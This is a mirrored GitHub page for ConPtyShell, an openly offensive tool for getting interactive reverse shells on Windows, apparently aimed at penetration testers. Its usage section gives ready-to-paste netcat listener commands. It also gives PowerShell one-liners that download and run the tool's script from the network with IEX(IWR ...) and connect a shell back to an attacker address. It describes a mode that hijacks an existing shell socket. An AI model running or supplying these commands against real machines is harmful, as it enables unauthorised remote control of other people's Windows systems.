antonioCoco/ConPtyShell
Fork: 161 Star: 1020 (更新于 2024-11-15 21:15:12)
license: MIT
Language: PowerShell .
ConPtyShell - Fully Interactive Reverse Shell for Windows
最后发布版本: 1.5 ( 2022-03-18 07:01:09)
ConPtyShell
ConPtyShell is a Fully Interactive Reverse Shell for Windows systems.
The introduction of the Pseudo Console (ConPty) in Windows has improved so much the way Windows handles terminals. ConPtyShell uses this feature to literally transform your bash in a remote powershell.
Briefly, it creates a Pseudo Console and attaches 2 pipes.
Then it creates the shell process (default powershell.exe) attaching the Pseudo Console with redirected input/output.
Then starts 2 Threads for Async I/O:
- one thread for reading from the socket and writing to Pseudo Console input pipe;
- the second thread for reading from the Pseudo Console output pipe and writing to the socket.
ConPtyShell has also the magic flag "Upgrade" that transform your current shell in a fully interactive one, use it if you don't want to use a new connection and want to hijack your current shell socket :)
If you want to know further information regarding ConPty you can find a great article [1] in the references section.
NOTE: ConPtyShell uses the function CreatePseudoConsole(). This function is available since Windows 10 / Windows Server 2019 version 1809 (build 10.0.17763).
NOTE2: If the ConPTY is not available on the target system you will get a normal netcat-like interactive shell.
Requirements
Client Side: Windows version >= 10 / 2019 1809 (build >= 10.0.17763)
Server Side: any tcp listener, i.e. netcat
Usage
It's important to have the same rows and cols size between your terminal and the remote terminal if you want to have an aligned output on the shell.
Method 1
In this method the terminal size is set without you pass the rows and cols parameters to Invoke-ConPtyShell function:
Server Side:
stty raw -echo; (stty size; cat) | nc -lvnp 3001
Client Side:
IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.0.0.2 3001
Method 2
If you prefer to have more freedom on the tcp listener and your terminal you can proceed with a "Manual" way to get the reverse shell. In this case it's important that you set rows and cols size when calling the Invoke-ConPtyShell function:
Server Side:
stty size
nc -lvnp 3001
Wait For connection
ctrl+z
stty raw -echo; fg[ENTER]
Client Side:
Here you should use the values read from stty size
command in the Parameters -Rows and -Cols
IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell -RemoteIp 10.0.0.2 -RemotePort 3001 -Rows 24 -Cols 80
Method 3 - Upgrade
You can also upgrade your current shell to a fully interecative shell. In this case it's important that you set rows and cols size when calling the Invoke-ConPtyShell function:
Server Side:
stty size
nc -lvnp 3001
Wait For connection
ctrl+z
stty raw -echo; fg[ENTER]
Client Side:
Here you should use the values read from stty size
command in the Parameters -Rows and -Cols
IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell -Upgrade -Rows 24 -Cols 80
Change Console Size
In any case if you resize your terminal while you have already open the remote shell you can change the rows and cols size directly from powershell pasting the following code:
$width=80
$height=24
$Host.UI.RawUI.BufferSize = New-Object Management.Automation.Host.Size ($width, $height)
$Host.UI.RawUI.WindowSize = New-Object -TypeName System.Management.Automation.Host.Size -ArgumentList ($width, $height)
Demo
Below you can watch 2 demos. The first gif using the Method 1 with the compiled assemlby in exe format, the second gif is showing the Method 3 by upgrading your current shell with the ps1 script:
Method 1
Method 3 - Upgrade demo
References
- https://devblogs.microsoft.com/commandline/windows-command-line-introducing-the-windows-pseudo-console-conpty/
- https://github.com/microsoft/terminal
- https://www.usenix.org/conference/usenixsecurity20/presentation/niakanlahiji
- https://adepts.of0x.cc/shadowmove-hijack-socket/
Credits
- LupMan
最近版本更新:(数据更新于 2024-10-12 12:15:25)
2022-03-18 07:01:09 1.5
2021-06-20 22:35:08 1.4
2021-03-03 07:52:13 1.3
2020-03-15 10:20:21 1.2
2019-11-28 21:00:14 v1.1
2019-09-16 23:09:38 v1.0
主题(topics):
conpty, csharp, penetration-testing, powershell, shell, terminal
antonioCoco/ConPtyShell同语言 PowerShell最近更新仓库
2024-11-18 03:45:03 ntdevlabs/tiny11builder
2024-10-08 04:38:35 ChrisTitusTech/winutil
2024-09-24 22:59:06 jenkinsci/docker
2024-08-14 03:12:36 PSAppDeployToolkit/PSAppDeployToolkit
2024-08-04 15:03:04 dataplat/dbatools
2024-07-19 04:02:17 actions/runner-images